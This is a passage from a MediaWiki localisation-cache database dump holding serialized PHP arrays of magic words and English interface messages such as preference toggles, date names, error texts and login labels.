;s:13:\"DIRECTIONMARK\";i:2;s:7:\"DIRMARK\";}s:8:\"language\";a:2:{i:0;i:0;i:1;s:10:\"#LANGUAGE:\";}s:15:\"contentlanguage\";a:3:{i:0;i:1;i:1;s:15:\"CONTENTLANGUAGE\";i:2;s:11:\"CONTENTLANG\";}s:16:\"pagesinnamespace\";a:3:{i:0;i:1;i:1;s:17:\"PAGESINNAMESPACE:\";i:2;s:10:\"PAGESINNS:\";}s:14:\"numberofadmins\";a:2:{i:0;i:1;i:1;s:14:\"NUMBEROFADMINS\";}s:9:\"formatnum\";a:2:{i:0;i:0;i:1;s:9:\"FORMATNUM\";}s:7:\"padleft\";a:2:{i:0;i:0;i:1;s:7:\"PADLEFT\";}s:8:\"padright\";a:2:{i:0;i:0;i:1;s:8:\"PADRIGHT\";}s:7:\"special\";a:2:{i:0;i:0;i:1;s:7:\"special\";}s:8:\"speciale\";a:2:{i:0;i:0;i:1;s:8:\"speciale\";}s:11:\"defaultsort\";a:4:{i:0;i:1;i:1;s:12:\"DEFAULTSORT:\";i:2;s:15:\"DEFAULTSORTKEY:\";i:3;s:20:\"DEFAULTCATEGORYSORT:\";}s:8:\"filepath\";a:2:{i:0;i:0;i:1;s:9:\"FILEPATH:\";}s:3:\"tag\";a:2:{i:0;i:0;i:1;s:3:\"tag\";}s:9:\"hiddencat\";a:2:{i:0;i:1;i:1;s:13:\"__HIDDENCAT__\";}s:15:\"pagesincategory\";a:3:{i:0;i:1;i:1;s:15:\"PAGESINCATEGORY\";i:2;s:10:\"PAGESINCAT\";}s:8:\"pagesize\";a:2:{i:0;i:1;i:1;s:8:\"PAGESIZE\";}s:5:\"index\";a:2:{i:0;i:1;i:1;s:9:\"__INDEX__\";}s:7:\"noindex\";a:2:{i:0;i:1;i:1;s:11:\"__NOINDEX__\";}s:13:\"numberingroup\";a:3:{i:0;i:1;i:1;s:13:\"NUMBERINGROUP\";i:2;s:10:\"NUMINGROUP\";}s:14:\"staticredirect\";a:2:{i:0;i:1;i:1;s:18:\"__STATICREDIRECT__\";}s:15:\"protectionlevel\";a:2:{i:0;i:1;i:1;s:15:\"PROTECTIONLEVEL\";}s:16:\"cascadingsources\";a:2:{i:0;i:1;i:1;s:16:\"CASCADINGSOURCES\";}s:10:\"formatdate\";a:3:{i:0;i:0;i:1;s:10:\"formatdate\";i:2;s:10:\"dateformat\";}s:8:\"url_path\";a:2:{i:0;i:0;i:1;s:4:\"PATH\";}s:8:\"url_wiki\";a:2:{i:0;i:0;i:1;s:4:\"WIKI\";}s:9:\"url_query\";a:2:{i:0;i:0;i:1;s:5:\"QUERY\";}s:19:\"defaultsort_noerror\";a:2:{i:0;i:0;i:1;s:7:\"noerror\";}s:21:\"defaultsort_noreplace\";a:2:{i:0;i:0;i:1;s:9:\"noreplace\";}s:20:\"displaytitle_noerror\";a:2:{i:0;i:0;i:1;s:7:\"noerror\";}s:22:\"displaytitle_noreplace\";a:2:{i:0;i:0;i:1;s:9:\"noreplace\";}s:19:\"pagesincategory_all\";a:2:{i:0;i:0;i:1;s:3:\"all\";}s:21:\"pagesincategory_pages\";a:2:{i:0;i:0;i:1;s:5:\"pages\";}s:23:\"pagesincategory_subcats\";a:2:{i:0;i:0;i:1;s:7:\"subcats\";}s:21:\"pagesincategory_files\";a:2:{i:0;i:0;i:1;s:5:\"files\";}}'),('en','messages:sidebar','s:158:\"\n* navigation\n** mainpage|mainpage-description\n** recentchanges-url|recentchanges\n** randompage-url|randompage\n** helppage|help\n* SEARCH\n* TOOLBOX\n* LANGUAGES\";'),('en','messages:tog-underline','s:17:\"Link underlining:\";'),('en','messages:tog-hideminor','s:36:\"Hide minor edits from recent changes\";'),('en','messages:tog-hidepatrolled','s:40:\"Hide patrolled edits from recent changes\";'),('en','messages:tog-newpageshidepatrolled','s:39:\"Hide patrolled pages from new page list\";'),('en','messages:tog-extendwatchlist','s:62:\"Expand watchlist to show all changes, not just the most recent\";'),('en','messages:tog-usenewrc','s:53:\"Group changes by page in recent changes and watchlist\";'),('en','messages:tog-numberheadings','s:20:\"Auto-number headings\";'),('en','messages:tog-showtoolbar','s:17:\"Show edit toolbar\";'),('en','messages:tog-editondblclick','s:26:\"Edit pages on double click\";'),('en','messages:tog-editsectiononrightclick','s:58:\"Enable section editing by right clicking on section titles\";'),('en','messages:tog-watchcreations','s:53:\"Add pages I create and files I upload to my watchlist\";'),('en','messages:tog-watchdefault','s:42:\"Add pages and files I edit to my watchlist\";'),('en','messages:tog-watchmoves','s:42:\"Add pages and files I move to my watchlist\";'),('en','messages:tog-watchdeletion','s:44:\"Add pages and files I delete to my watchlist\";'),('en','messages:tog-watchrollback','s:59:\"Add pages where I have performed a rollback to my watchlist\";'),('en','messages:tog-minordefault','s:31:\"Mark all edits minor by default\";'),('en','messages:tog-previewontop','s:28:\"Show preview before edit box\";'),('en','messages:tog-previewonfirst','s:26:\"Show preview on first edit\";'),('en','messages:tog-enotifwatchlistpages','s:55:\"Email me when a page or file on my watchlist is changed\";'),('en','messages:tog-enotifusertalkpages','s:42:\"Email me when my user talk page is changed\";'),('en','messages:tog-enotifminoredits','s:48:\"Email me also for minor edits of pages and files\";'),('en','messages:tog-enotifrevealaddr','s:46:\"Reveal my email address in notification emails\";'),('en','messages:tog-shownumberswatching','s:33:\"Show the number of watching users\";'),('en','messages:tog-oldsig','s:19:\"Existing signature:\";'),('en','messages:tog-fancysig','s:55:\"Treat signature as wikitext (without an automatic link)\";'),('en','messages:tog-uselivepreview','s:31:\"Use live preview (experimental)\";'),('en','messages:tog-forceeditsummary','s:44:\"Prompt me when entering a blank edit summary\";'),('en','messages:tog-watchlisthideown','s:32:\"Hide my edits from the watchlist\";'),('en','messages:tog-watchlisthidebots','s:33:\"Hide bot edits from the watchlist\";'),('en','messages:tog-watchlisthideminor','s:35:\"Hide minor edits from the watchlist\";'),('en','messages:tog-watchlisthideliu','s:48:\"Hide edits by logged in users from the watchlist\";'),('en','messages:tog-watchlisthideanons','s:48:\"Hide edits by anonymous users from the watchlist\";'),('en','messages:tog-watchlisthidepatrolled','s:39:\"Hide patrolled edits from the watchlist\";'),('en','messages:tog-ccmeonemails','s:46:\"Send me copies of emails I send to other users\";'),('en','messages:tog-diffonly','s:36:\"Do not show page content below diffs\";'),('en','messages:tog-showhiddencats','s:22:\"Show hidden categories\";'),('en','messages:tog-norollbackdiff','s:37:\"Omit diff after performing a rollback\";'),('en','messages:tog-useeditwarning','s:54:\"Warn me when I leave an edit page with unsaved changes\";'),('en','messages:tog-prefershttps','s:45:\"Always use a secure connection when logged in\";'),('en','messages:underline-always','s:6:\"Always\";'),('en','messages:underline-never','s:5:\"Never\";'),('en','messages:underline-default','s:23:\"Skin or browser default\";'),('en','messages:editfont-style','s:21:\"Edit area font style:\";'),('en','messages:editfont-default','s:15:\"Browser default\";'),('en','messages:editfont-monospace','s:15:\"Monospaced font\";'),('en','messages:editfont-sansserif','s:15:\"Sans-serif font\";'),('en','messages:editfont-serif','s:10:\"Serif font\";'),('en','messages:sunday','s:6:\"Sunday\";'),('en','messages:monday','s:6:\"Monday\";'),('en','messages:tuesday','s:7:\"Tuesday\";'),('en','messages:wednesday','s:9:\"Wednesday\";'),('en','messages:thursday','s:8:\"Thursday\";'),('en','messages:friday','s:6:\"Friday\";'),('en','messages:saturday','s:8:\"Saturday\";'),('en','messages:sun','s:3:\"Sun\";'),('en','messages:mon','s:3:\"Mon\";'),('en','messages:tue','s:3:\"Tue\";'),('en','messages:wed','s:3:\"Wed\";'),('en','messages:thu','s:3:\"Thu\";'),('en','messages:fri','s:3:\"Fri\";'),('en','messages:sat','s:3:\"Sat\";'),('en','messages:january','s:7:\"January\";'),('en','messages:february','s:8:\"February\";'),('en','messages:march','s:5:\"March\";'),('en','messages:april','s:5:\"April\";'),('en','messages:may_long','s:3:\"May\";'),('en','messages:june','s:4:\"June\";'),('en','messages:july','s:4:\"July\";'),('en','messages:august','s:6:\"August\";'),('en','messages:september','s:9:\"September\";'),('en','messages:october','s:7:\"October\";'),('en','messages:november','s:8:\"November\";'),('en','messages:december','s:8:\"December\";'),('en','messages:january-gen','s:7:\"January\";'),('en','messages:february-gen','s:8:\"February\";'),('en','messages:march-gen','s:5:\"March\";'),('en','messages:april-gen','s:5:\"April\";'),('en','messages:may-gen','s:3:\"May\";'),('en','messages:june-gen','s:4:\"June\";'),('en','messages:july-gen','s:4:\"July\";'),('en','messages:august-gen','s:6:\"August\";'),('en','messages:september-gen','s:9:\"September\";'),('en','messages:october-gen','s:7:\"October\";'),('en','messages:november-gen','s:8:\"November\";'),('en','messages:december-gen','s:8:\"December\";'),('en','messages:jan','s:3:\"Jan\";'),('en','messages:feb','s:3:\"Feb\";'),('en','messages:mar','s:3:\"Mar\";'),('en','messages:apr','s:3:\"Apr\";'),('en','messages:may','s:3:\"May\";'),('en','messages:jun','s:3:\"Jun\";'),('en','messages:jul','s:3:\"Jul\";'),('en','messages:aug','s:3:\"Aug\";'),('en','messages:sep','s:3:\"Sep\";'),('en','messages:oct','s:3:\"Oct\";'),('en','messages:nov','s:3:\"Nov\";'),('en','messages:dec','s:3:\"Dec\";'),('en','messages:january-date','s:10:\"January $1\";'),('en','messages:february-date','s:11:\"February $1\";'),('en','messages:march-date','s:8:\"March $1\";'),('en','messages:april-date','s:8:\"April $1\";'),('en','messages:may-date','s:6:\"May $1\";'),('en','messages:june-date','s:7:\"June $1\";'),('en','messages:july-date','s:7:\"July $1\";'),('en','messages:august-date','s:9:\"August $1\";'),('en','messages:september-date','s:12:\"September $1\";'),('en','messages:october-date','s:10:\"October $1\";'),('en','messages:november-date','s:11:\"November $1\";'),('en','messages:december-date','s:11:\"December $1\";'),('en','messages:pagecategories','s:33:\"{{PLURAL:$1|Category|Categories}}\";'),('en','messages:pagecategorieslink','s:18:\"Special:Categories\";'),('en','messages:category_header','s:22:\"Pages in category \"$1\"\";'),('en','messages:subcategories','s:13:\"Subcategories\";'),('en','messages:category-media-header','s:22:\"Media in category \"$1\"\";'),('en','messages:category-empty','s:60:\"This category currently contains no pages or media.\";'),('en','messages:hidden-categories','s:47:\"{{PLURAL:$1|Hidden category|Hidden categories}}\";'),('en','messages:hidden-category-category','s:17:\"Hidden categories\";'),('en','messages:category-subcat-count','s:156:\"{{PLURAL:$2|This category has only the following subcategory.|This category has the following {{PLURAL:$1|subcategory|$1 subcategories}}, out of $2 total.}}\";'),('en','messages:category-subcat-count-limited','s:75:\"This category has the following {{PLURAL:$1|subcategory|$1 subcategories}}.\";'),('en','messages:category-article-count','s:145:\"{{PLURAL:$2|This category contains only the following page.|The following {{PLURAL:$1|page is|$1 pages are}} in this category, out of $2 total.}}\";'),('en','messages:category-article-count-limited','s:73:\"The following {{PLURAL:$1|page is|$1 pages are}} in the current category.\";'),('en','messages:category-file-count','s:145:\"{{PLURAL:$2|This category contains only the following file.|The following {{PLURAL:$1|file is|$1 files are}} in this category, out of $2 total.}}\";'),('en','messages:category-file-count-limited','s:73:\"The following {{PLURAL:$1|file is|$1 files are}} in the current category.\";'),('en','messages:listingcontinuesabbrev','s:5:\"cont.\";'),('en','messages:index-category','s:13:\"Indexed pages\";'),('en','messages:noindex-category','s:15:\"Noindexed pages\";'),('en','messages:broken-file-category','s:28:\"Pages with broken file links\";'),('en','messages:categoryviewer-pagedlinks','s:9:\"($1) ($2)\";'),('en','messages:about','s:5:\"About\";'),('en','messages:article','s:12:\"Content page\";'),('en','messages:newwindow','s:21:\"(opens in new window)\";'),('en','messages:cancel','s:6:\"Cancel\";'),('en','messages:moredotdotdot','s:7:\"More...\";'),('en','messages:morenotlisted','s:26:\"This list is not complete.\";'),('en','messages:mypage','s:4:\"Page\";'),('en','messages:mytalk','s:4:\"Talk\";'),('en','messages:anontalk','s:24:\"Talk for this IP address\";'),('en','messages:navigation','s:10:\"Navigation\";'),('en','messages:and','s:8:\" and\";'),('en','messages:qbfind','s:4:\"Find\";'),('en','messages:qbbrowse','s:6:\"Browse\";'),('en','messages:qbedit','s:4:\"Edit\";'),('en','messages:qbpageoptions','s:9:\"This page\";'),('en','messages:qbmyoptions','s:8:\"My pages\";'),('en','messages:faq','s:3:\"FAQ\";'),('en','messages:faqpage','s:11:\"Project:FAQ\";'),('en','messages:sitetitle','s:12:\"{{SITENAME}}\";'),('en','messages:sitesubtitle','s:0:\"\";'),('en','messages:actions','s:7:\"Actions\";'),('en','messages:namespaces','s:10:\"Namespaces\";'),('en','messages:variants','s:8:\"Variants\";'),('en','messages:navigation-heading','s:15:\"Navigation menu\";'),('en','messages:errorpagetitle','s:5:\"Error\";'),('en','messages:returnto','s:13:\"Return to $1.\";'),('en','messages:tagline','s:17:\"From {{SITENAME}}\";'),('en','messages:help','s:4:\"Help\";'),('en','messages:search','s:6:\"Search\";'),('en','messages:searchbutton','s:6:\"Search\";'),('en','messages:go','s:2:\"Go\";'),('en','messages:searcharticle','s:2:\"Go\";'),('en','messages:history','s:12:\"Page history\";'),('en','messages:history_short','s:7:\"History\";'),('en','messages:updatedmarker','s:27:\"updated since my last visit\";'),('en','messages:printableversion','s:17:\"Printable version\";'),('en','messages:permalink','s:14:\"Permanent link\";'),('en','messages:print','s:5:\"Print\";'),('en','messages:view','s:4:\"View\";'),('en','messages:view-foreign','s:10:\"View on $1\";'),('en','messages:edit','s:4:\"Edit\";'),('en','messages:edit-local','s:22:\"Edit local description\";'),('en','messages:create','s:6:\"Create\";'),('en','messages:create-local','s:21:\"Add local description\";'),('en','messages:editthispage','s:14:\"Edit this page\";'),('en','messages:create-this-page','s:16:\"Create this page\";'),('en','messages:delete','s:6:\"Delete\";'),('en','messages:deletethispage','s:16:\"Delete this page\";'),('en','messages:undeletethispage','s:18:\"Undelete this page\";'),('en','messages:undelete_short','s:40:\"Undelete {{PLURAL:$1|one edit|$1 edits}}\";'),('en','messages:viewdeleted_short','s:52:\"View {{PLURAL:$1|one deleted edit|$1 deleted edits}}\";'),('en','messages:protect','s:7:\"Protect\";'),('en','messages:protect_change','s:6:\"change\";'),('en','messages:protectthispage','s:17:\"Protect this page\";'),('en','messages:unprotect','s:17:\"Change protection\";'),('en','messages:unprotectthispage','s:30:\"Change protection of this page\";'),('en','messages:newpage','s:8:\"New page\";'),('en','messages:talkpage','s:17:\"Discuss this page\";'),('en','messages:talkpagelinktext','s:4:\"Talk\";'),('en','messages:specialpage','s:12:\"Special page\";'),('en','messages:personaltools','s:14:\"Personal tools\";'),('en','messages:addsection','s:1:\"+\";'),('en','messages:articlepage','s:17:\"View content page\";'),('en','messages:talk','s:10:\"Discussion\";'),('en','messages:views','s:5:\"Views\";'),('en','messages:toolbox','s:5:\"Tools\";'),('en','messages:userpage','s:14:\"View user page\";'),('en','messages:projectpage','s:17:\"View project page\";'),('en','messages:imagepage','s:14:\"View file page\";'),('en','messages:mediawikipage','s:17:\"View message page\";'),('en','messages:templatepage','s:18:\"View template page\";'),('en','messages:viewhelppage','s:14:\"View help page\";'),('en','messages:categorypage','s:18:\"View category page\";'),('en','messages:viewtalkpage','s:15:\"View discussion\";'),('en','messages:otherlanguages','s:18:\"In other languages\";'),('en','messages:redirectedfrom','s:20:\"(Redirected from $1)\";'),('en','messages:redirectpagesub','s:13:\"Redirect page\";'),('en','messages:redirectto','s:12:\"Redirect to:\";'),('en','messages:talkpageheader','s:1:\"-\";'),('en','messages:lastmodifiedat','s:41:\"This page was last modified on $1, at $2.\";'),('en','messages:viewcount','s:56:\"This page has been accessed {{PLURAL:$1|once|$1 times}}.\";'),('en','messages:protectedpage','s:14:\"Protected page\";'),('en','messages:jumpto','s:8:\"Jump to:\";'),('en','messages:jumptonavigation','s:10:\"navigation\";'),('en','messages:jumptosearch','s:6:\"search\";'),('en','messages:view-pool-error','s:159:\"Sorry, the servers are overloaded at the moment.\nToo many users are trying to view this page.\nPlease wait a while before you try to access this page again.\n\n$1\";'),('en','messages:generic-pool-error','s:163:\"Sorry, the servers are overloaded at the moment.\nToo many users are trying to view this resource.\nPlease wait a while before you try to access this resource again.\";'),('en','messages:pool-timeout','s:28:\"Timeout waiting for the lock\";'),('en','messages:pool-queuefull','s:18:\"Pool queue is full\";'),('en','messages:pool-errorunknown','s:13:\"Unknown error\";'),('en','messages:pool-servererror','s:47:\"The pool counter service is not available ($1).\";'),('en','messages:aboutsite','s:18:\"About {{SITENAME}}\";'),('en','messages:aboutpage','s:13:\"Project:About\";'),('en','messages:copyright','s:53:\"Content is available under $1 unless otherwise noted.\";'),('en','messages:copyrightpage','s:25:\"{{ns:project}}:Copyrights\";'),('en','messages:currentevents','s:14:\"Current events\";'),('en','messages:currentevents-url','s:22:\"Project:Current events\";'),('en','messages:disclaimers','s:11:\"Disclaimers\";'),('en','messages:disclaimerpage','s:26:\"Project:General disclaimer\";'),('en','messages:edithelp','s:12:\"Editing help\";'),('en','messages:edithelppage','s:68:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Editing_pages\";'),('en','messages:helppage','s:63:\"https://www.mediawiki.org/wiki/Special:MyLanguage/Help:Contents\";'),('en','messages:mainpage','s:9:\"Main Page\";'),('en','messages:mainpage-description','s:9:\"Main page\";'),('en','messages:policy-url','s:14:\"Project:Policy\";'),('en','messages:portal','s:16:\"Community portal\";'),('en','messages:portal-url','s:24:\"Project:Community portal\";'),('en','messages:privacy','s:14:\"Privacy policy\";'),('en','messages:privacypage','s:22:\"Project:Privacy policy\";'),('en','messages:badaccess','s:16:\"Permission error\";'),('en','messages:badaccess-group0','s:61:\"You are not allowed to execute the action you have requested.\";'),('en','messages:badaccess-groups','s:99:\"The action you have requested is limited to users in {{PLURAL:$2|the group|one of the groups}}: $1.\";'),('en','messages:versionrequired','s:32:\"Version $1 of MediaWiki required\";'),('en','messages:versionrequiredtext','s:91:\"Version $1 of MediaWiki is required to use this page.\nSee [[Special:Version|version page]].\";'),('en','messages:ok','s:2:\"OK\";'),('en','messages:pagetitle','s:17:\"$1 - {{SITENAME}}\";'),('en','messages:pagetitle-view-mainpage','s:12:\"{{SITENAME}}\";'),('en','messages:backlinksubtitle','s:6:\"← $1\";'),('en','messages:retrievedfrom','s:19:\"Retrieved from \"$1\"\";'),('en','messages:youhavenewmessages','s:31:\"{{PLURAL:$3|You have}} $1 ($2).\";'),('en','messages:youhavenewmessagesfromusers','s:72:\"{{PLURAL:$4|You have}} $1 from {{PLURAL:$3|another user|$3 users}} ($2).\";'),('en','messages:youhavenewmessagesmanyusers','s:33:\"You have $1 from many users ($2).\";'),('en','messages:newmessageslinkplural','s:44:\"{{PLURAL:$1|a new message|999=new messages}}\";'),('en','messages:newmessagesdifflinkplural','s:37:\"last {{PLURAL:$1|change|999=changes}}\";'),('en','messages:youhavenewmessagesmulti','s:27:\"You have new messages on $1\";'),('en','messages:newtalkseparator','s:6:\", \";'),('en','messages:editsection','s:4:\"edit\";'),('en','messages:editold','s:4:\"edit\";'),('en','messages:viewsourceold','s:11:\"view source\";'),('en','messages:editlink','s:4:\"edit\";'),('en','messages:viewsourcelink','s:11:\"view source\";'),('en','messages:editsectionhint','s:16:\"Edit section: $1\";'),('en','messages:toc','s:8:\"Contents\";'),('en','messages:showtoc','s:4:\"show\";'),('en','messages:hidetoc','s:4:\"hide\";'),('en','messages:collapsible-collapse','s:8:\"Collapse\";'),('en','messages:collapsible-expand','s:6:\"Expand\";'),('en','messages:confirmable-confirm','s:27:\"Are {{GENDER:$1|you}} sure?\";'),('en','messages:confirmable-yes','s:3:\"Yes\";'),('en','messages:confirmable-no','s:2:\"No\";'),('en','messages:thisisdeleted','s:19:\"View or restore $1?\";'),('en','messages:viewdeleted','s:8:\"View $1?\";'),('en','messages:restorelink','s:47:\"{{PLURAL:$1|one deleted edit|$1 deleted edits}}\";'),('en','messages:feedlinks','s:5:\"Feed:\";'),('en','messages:feed-invalid','s:31:\"Invalid subscription feed type.\";'),('en','messages:feed-unavailable','s:35:\"Syndication feeds are not available\";'),('en','messages:site-rss-feed','s:11:\"$1 RSS feed\";'),('en','messages:site-atom-feed','s:12:\"$1 Atom feed\";'),('en','messages:page-rss-feed','s:13:\"\"$1\" RSS feed\";'),('en','messages:page-atom-feed','s:14:\"\"$1\" Atom feed\";'),('en','messages:feed-atom','s:4:\"Atom\";'),('en','messages:feed-rss','s:3:\"RSS\";'),('en','messages:sitenotice','s:1:\"-\";'),('en','messages:anonnotice','s:1:\"-\";'),('en','messages:newsectionheaderdefaultlevel','s:8:\"== $1 ==\";'),('en','messages:red-link-title','s:24:\"$1 (page does not exist)\";'),('en','messages:sort-descending','s:15:\"Sort descending\";'),('en','messages:sort-ascending','s:14:\"Sort ascending\";'),('en','messages:nstab-main','s:4:\"Page\";'),('en','messages:nstab-user','s:9:\"User page\";'),('en','messages:nstab-media','s:10:\"Media page\";'),('en','messages:nstab-special','s:12:\"Special page\";'),('en','messages:nstab-project','s:12:\"Project page\";'),('en','messages:nstab-image','s:4:\"File\";'),('en','messages:nstab-mediawiki','s:7:\"Message\";'),('en','messages:nstab-template','s:8:\"Template\";'),('en','messages:nstab-help','s:9:\"Help page\";'),('en','messages:nstab-category','s:8:\"Category\";'),('en','messages:mainpage-nstab','s:0:\"\";'),('en','messages:nosuchaction','s:14:\"No such action\";'),('en','messages:nosuchactiontext','s:176:\"The action specified by the URL is invalid.\nYou might have mistyped the URL, or followed an incorrect link.\nThis might also indicate a bug in the software used by {{SITENAME}}.\";'),('en','messages:nosuchspecialpage','s:20:\"No such special page\";'),('en','messages:nospecialpagetext','s:154:\"You have requested an invalid special page.\n\nA list of valid special pages can be found at [[Special:SpecialPages|{{int:specialpages}}]].\";'),('en','messages:error','s:5:\"Error\";'),('en','messages:databaseerror','s:14:\"Database error\";'),('en','messages:databaseerror-text','s:77:\"A database query error has occurred.\nThis may indicate a bug in the software.\";'),('en','messages:databaseerror-textcl','s:36:\"A database query error has occurred.\";'),('en','messages:databaseerror-query','s:9:\"Query: $1\";'),('en','messages:databaseerror-function','s:12:\"Function: $1\";'),('en','messages:databaseerror-error','s:9:\"Error: $1\";'),('en','messages:laggedslavemode','s:62:\"Warning: Page may not contain recent updates.\";'),('en','messages:readonly','s:15:\"Database locked\";'),('en','messages:enterlockreason','s:84:\"Enter a reason for the lock, including an estimate of when the lock will be released\";'),('en','messages:readonlytext','s:216:\"The database is currently locked to new entries and other modifications, probably for routine database maintenance, after which it will be back to normal.\n\nThe administrator who locked it offered this explanation: $1\";'),('en','messages:missing-article','s:349:\"The database did not find the text of a page that it should have found, named \"$1\" $2.\n\nThis is usually caused by following an outdated diff or history link to a page that has been deleted.\n\nIf this is not the case, you may have found a bug in the software.\nPlease report this to an [[Special:ListUsers/sysop|administrator]], making note of the URL.\";'),('en','messages:missingarticle-rev','s:15:\"(revision#: $1)\";'),('en','messages:missingarticle-diff','s:14:\"(Diff: $1, $2)\";'),('en','messages:readonly_lag','s:98:\"The database has been automatically locked while the slave database servers catch up to the master\";'),('en','messages:internalerror','s:14:\"Internal error\";'),('en','messages:internalerror_info','s:18:\"Internal error: $1\";'),('en','messages:filecopyerror','s:33:\"Could not copy file \"$1\" to \"$2\".\";'),('en','messages:filerenameerror','s:35:\"Could not rename file \"$1\" to \"$2\".\";'),('en','messages:filedeleteerror','s:27:\"Could not delete file \"$1\".\";'),('en','messages:directorycreateerror','s:32:\"Could not create directory \"$1\".\";'),('en','messages:filenotfound','s:25:\"Could not find file \"$1\".\";'),('en','messages:unexpected','s:28:\"Unexpected value: \"$1\"=\"$2\".\";'),('en','messages:formerror','s:29:\"Error: Could not submit form.\";'),('en','messages:badarticleerror','s:45:\"This action cannot be performed on this page.\";'),('en','messages:cannotdelete','s:93:\"The page or file \"$1\" could not be deleted.\nIt may have already been deleted by someone else.\";'),('en','messages:cannotdelete-title','s:23:\"Cannot delete page \"$1\"\";'),('en','messages:delete-hook-aborted','s:49:\"Deletion aborted by hook.\nIt gave no explanation.\";'),('en','messages:no-null-revision','s:48:\"Could not create new null revision for page \"$1\"\";'),('en','messages:badtitle','s:9:\"Bad title\";'),('en','messages:badtitletext','s:174:\"The requested page title was invalid, empty, or an incorrectly linked inter-language or inter-wiki title.\nIt may contain one or more characters that cannot be used in titles.\";'),('en','messages:perfcached','s:135:\"The following data is cached and may not be up to date. A maximum of {{PLURAL:$1|one result is|$1 results are}} available in the cache.\";'),('en','messages:perfcachedts','s:134:\"The following data is cached, and was last updated $1. A maximum of {{PLURAL:$4|one result is|$4 results are}} available in the cache.\";'),('en','messages:querypage-no-updates','s:88:\"Updates for this page are currently disabled.\nData here will not presently be refreshed.\";'),('en','messages:viewsource','s:11:\"View source\";'),('en','messages:viewsource-title','s:18:\"View source for $1\";'),('en','messages:actionthrottled','s:16:\"Action throttled\";'),('en','messages:actionthrottledtext','s:178:\"As an anti-spam measure, you are limited from performing this action too many times in a short space of time, and you have exceeded this limit.\nPlease try again in a few minutes.\";'),('en','messages:protectedpagetext','s:65:\"This page has been protected to prevent editing or other actions.\";'),('en','messages:viewsourcetext','s:46:\"You can view and copy the source of this page:\";'),('en','messages:viewyourtext','s:77:\"You can view and copy the source of your edits to this page:\";'),('en','messages:protectedinterface','s:233:\"This page provides interface text for the software on this wiki, and is protected to prevent abuse.\nTo add or change translations for all wikis, please use [//translatewiki.net/ translatewiki.net], the MediaWiki localisation project.\";'),('en','messages:editinginterface','s:339:\"Warning: You are editing a page that is used to provide interface text for the software.\nChanges to this page will affect the appearance of the user interface for other users on this wiki.\nTo add or change translations for all wikis, please use [//translatewiki.net/ translatewiki.net], the MediaWiki localisation project.\";'),('en','messages:cascadeprotected','s:179:\"This page has been protected from editing because it is included in the following {{PLURAL:$1|page, which is|pages, which are}} protected with the \"cascading\" option turned on:\n$2\";'),('en','messages:namespaceprotected','s:78:\"You do not have permission to edit pages in the $1 namespace.\";'),('en','messages:customcssprotected','s:102:\"You do not have permission to edit this CSS page because it contains another user\'s personal settings.\";'),('en','messages:customjsprotected','s:109:\"You do not have permission to edit this JavaScript page because it contains another user\'s personal settings.\";'),('en','messages:mycustomcssprotected','s:49:\"You do not have permission to edit this CSS page.\";'),('en','messages:mycustomjsprotected','s:56:\"You do not have permission to edit this JavaScript page.\";'),('en','messages:myprivateinfoprotected','s:60:\"You do not have permission to edit your private information.\";'),('en','messages:mypreferencesprotected','s:52:\"You do not have permission to edit your preferences.\";'),('en','messages:ns-specialprotected','s:31:\"Special pages cannot be edited.\";'),('en','messages:titleprotected','s:97:\"This title has been protected from creation by [[User:$1|$1]].\nThe reason given is \"$2\".\";'),('en','messages:filereadonlyerror','s:150:\"Unable to modify the file \"$1\" because the file repository \"$2\" is in read-only mode.\n\nThe administrator who locked it offered this explanation: \"$3\".\";'),('en','messages:invalidtitle-knownnamespace','s:47:\"Invalid title with namespace \"$2\" and text \"$3\"\";'),('en','messages:invalidtitle-unknownnamespace','s:60:\"Invalid title with unknown namespace number $1 and text \"$2\"\";'),('en','messages:exception-nologin','s:13:\"Not logged in\";'),('en','messages:exception-nologin-text','s:55:\"Please log in to be able to access this page or action.\";'),('en','messages:exception-nologin-text-manual','s:51:\"Please $1 to be able to access this page or action.\";'),('en','messages:virus-badscanner','s:53:\"Bad configuration: Unknown virus scanner: $1\";'),('en','messages:virus-scanfailed','s:21:\"scan failed (code $1)\";'),('en','messages:virus-unknownscanner','s:18:\"unknown antivirus:\";'),('en','messages:logouttext','s:159:\"You are now logged out.\n\nNote that some pages may continue to be displayed as if you were still logged in, until you clear your browser cache.\";'),('en','messages:welcomeuser','s:12:\"Welcome, $1!\";'),('en','messages:welcomecreation-msg','s:112:\"Your account has been created.\nYou can change your {{SITENAME}} [[Special:Preferences|preferences]] if you wish.\";'),('en','messages:yourname','s:9:\"Username:\";'),('en','messages:userlogin-yourname','s:8:\"Username\";'),('en','messages:userlogin-yourname-ph','s:19:\"Enter your username\";'),('en','messages:createacct-another-username-ph','s:18:\"Enter the username\";'),('en','messages:createacct-helpusername','s:0:\"\";'),('en','messages:yourpassword','s:9:\"Password:\";'),('en','messages:userlogin-yourpassword','s:8:\"Password\";'),('en','messages:userlogin-yourpassword-ph','s:19:\"Enter your password\";'),('en','messages:createacct-yourpassword-ph','s:16:\"Enter a password\";'),('en','messages:yourpasswordagain','s:16:\"Retype password:\";'),('en','messages:createacct-yourpasswordagain','s:16:\"Confirm password\";'),('en','messages:createacct-yourpasswordagain-ph','s:20:\"Enter password again\";'),('en','messages:remembermypassword','s:78:\"Remember my login on this browser (for a maximum of $1 {{PLURAL:$1|day|days}})\";'),('en','messages:userlogin-remembermypassword','s:17:\"Keep me logged in\";'),('en','messages:userlogin-signwithsecure','s:21:\"Use secure connection\";'),('en','messages:yourdomainname','s:12:\"Your domain:\";'),('en','messages:password-change-forbidden','s:41:\"You cannot change passwords on this wiki.\";'),('en','messages:externaldberror','s:105:\"There was either an authentication database error or you are not allowed to update your external account.\";'),('en','messages:login','s:6:\"Log in\";'),('en','messages:nav-login-createaccount','s:23:\"Log in / create account\";'),('en','messages:loginprompt','s:0:\"\";'),('en','messages:userlogin','s:23:\"Log in / create account\";'),('en','messages:userloginnocreate','s:6:\"Log in\";'),('en','messages:logout','s:7:\"Log out\";'),('en','messages:userlogout','s:7:\"Log out\";'),('en','messages:userlogout-summary','s:0:\"\";'),('en','messages:notloggedin','s:13:\"Not logged in\";'),('en','messages:userlogin-noaccount','s:22:\"Don\'t have an account?\";'),('en','messages:userlogin-joinproject','s:17:\"Join {{SITENAME}}\";'),('en','messages:nologin','s:26:\"Don\'t have an account? $1.\";'),('en','messages:nologinlink','s:17:\"Create an account\";'),('en','messages:createaccount','s:14:\"Create account\";'),('en','messages:gotaccount','s:28:\"Already have an account? $1.\";'),('en','messages:gotaccountlink','s:6:\"Log 